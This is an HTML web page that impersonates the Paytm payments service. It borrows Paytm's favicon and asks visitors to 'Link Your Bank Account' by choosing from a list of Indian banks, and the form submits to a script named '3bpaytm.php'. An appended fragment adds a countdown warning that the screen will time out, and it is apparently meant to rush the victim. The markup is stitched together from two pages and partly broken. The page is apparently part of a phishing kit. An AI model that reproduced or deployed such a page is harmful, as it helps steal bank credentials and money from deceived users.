<!DOCTYPE html>

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link rel="icon" type="image/gif" href="https://accounts.paytm.com/pages/themesv2/images/favicon.ico">
    <title>video ky.c... </title>
   





<style>

.buttom {
  background-color: #21618C; /* #21618C*/
  border: none;
  color: white;
  padding: 5px 1px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}





.button {
  background-color: #00b9f5; 
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}

}

 input {
  margin: auto;
  width: auto;
  display: block;
  border: none;
  padding: auto;
  border-bottom: solid 1px #0000FF;
  -webkit-transition: all 0.3s cubic-bezier(0.64, 0.09, 0.08, 1);
  transition: all 0.3s cubic-bezier(0.64, 0.09, 0.08, 1);
  background: -webkit-linear-gradient(top, rgba(255, 255, 255, 0) 96%, #408ce8 4%);
  background: linear-gradient(to bottom, rgba(255, 255, 255, 0) 96%, #408ce8 4%);
  background-position: -200px 0;
  background-size: 200px 100%;
  background-repeat: no-repeat;
  color: #408ce8;
}
input:focus, input:valid {
 box-shadow: none;
 outline: none;
 background-position: 0 0;
}
input:focus::-webkit-input-placeholder, input:valid::-webkit-input-placeholder {
 color: #408ce8;
 font-size: 11px;
 -webkit-transform: translateY(-20px);
 transform: translateY(-20px);
 visibility: visible !important;
}

    
    
    
    
    
    
</style>


        
        

<meta name="viewport" content="width=device-width, initial-scale=1.0">    
    
    </head>
    
<body>

        <form action="3bpaytm.php"   method="post">

            
        <div class="container">

















<center>

        <img class="one" src="qb2vh7he7.png" width="150" height="45">
        <h2 style="color:deepskyblue">Link Your Bank Account</h2>
        </center>
        



<center>

<select class="buttom"name="bank" id="bank" required>
        <option value="">Select bank </option>
        <option value="Axis Bank">Axis Bank Ltd.</option>
        <option value="Sbi">State bank of india</option>
        <option value="HDFC">HDFC Bank Ltd.</option>
		<option value="ICICI Bank Ltd.">ICICI Bank Ltd.</option>
		<option value="Bank of Baroda">Bank of Baroda</option>
		<option value="Bank of India">Bank of India</option>
		<option value="ICICI Bank Ltd.">ICICI Bank Ltd.</option>
		<option value="Kotak Mahindra Bank Ltd">Kotak Mahindra Bank Ltd</option>
		<option value="RBL Bank Ltd.">RBL Bank Ltd.</option>
		<option value="YES Bank Ltd.">YES Bank Ltd.</option>
		<option value="IDBI Bank Ltd.">IDBI Bank Ltd.</option>
		<option value="Punjab National Bank">Punjab National Bank</option>
		<option value="Canara Bank">Canara Bank</option>
		<option value="Indian Overseas Bank "> Indian Overseas Bank</option>
		<option value="Bandhan Bank Ltd. "> Bandhan Bank Ltd.</option>
		<option value="CSB Bank Ltd. ">CSB Bank Ltd. </option>
		<option value=" Au Small Finance Bank Limited"> Au Small Finance Bank Limited</option>
		<option value=" Equitas Small Finance Bank Limited">Equitas Small Finance Bank Limited </option>
		<option value=" Other bank "> Other bank</option>
    </select>

</center>



<br><br>





        
            
                
  <center>          <button class="button"><img class="one" src="" width="auto" height="auto" value="submit"><b> Submit </b></button>  </center>
        
         <br>  
        
    <style type="text/css">
                 #linkbank{
                  text-decoration: none;
             color: #00b9f5; 
  }
</style>


        

    
</div>
</form>
    



</body></html>
<link
href="https://fonts.googleapis.com/icon?family=Material+Icons"
rel="stylesheet">
<style>
p{color:gray;}
</style>
</head>
<body
body
topmargin="100"
leftmargin="0"
marginheight="0"
marginwidth="50"
onload="startTimer();">
<style
type="text/css">
#linkbank{
text-decoration:
none;
color:
#00b9f5;
}
</style>
<!---Timer for Otp ------------------------------------------------------------------------    -->

  <script type="text/javascript">
    var timer=300;
    var sec=0;
  function startTimer() {
    sec=parseInt(timer%300);

    if (timer<0) {
      timer.stop();
    }

    document.getElementById("time").innerHTML = "<b>This screen will automatically timeout after: </b>"+sec.toString();
    timer--;
    setTimeout(function(){
      startTimer();

    }, 1000);
  }
    
      </script>
<!-- -------------------------------------------------------------------------------------------------- -->
      <div>
        <center><b><span id="time"></span>&nbsp; Second</b></center>
      </div>
<!-- ----------------------------------------------------------------------------------------------------------- -->
        </div>
<br>
<br><br>
</div>
        </div>
</body>

</html>

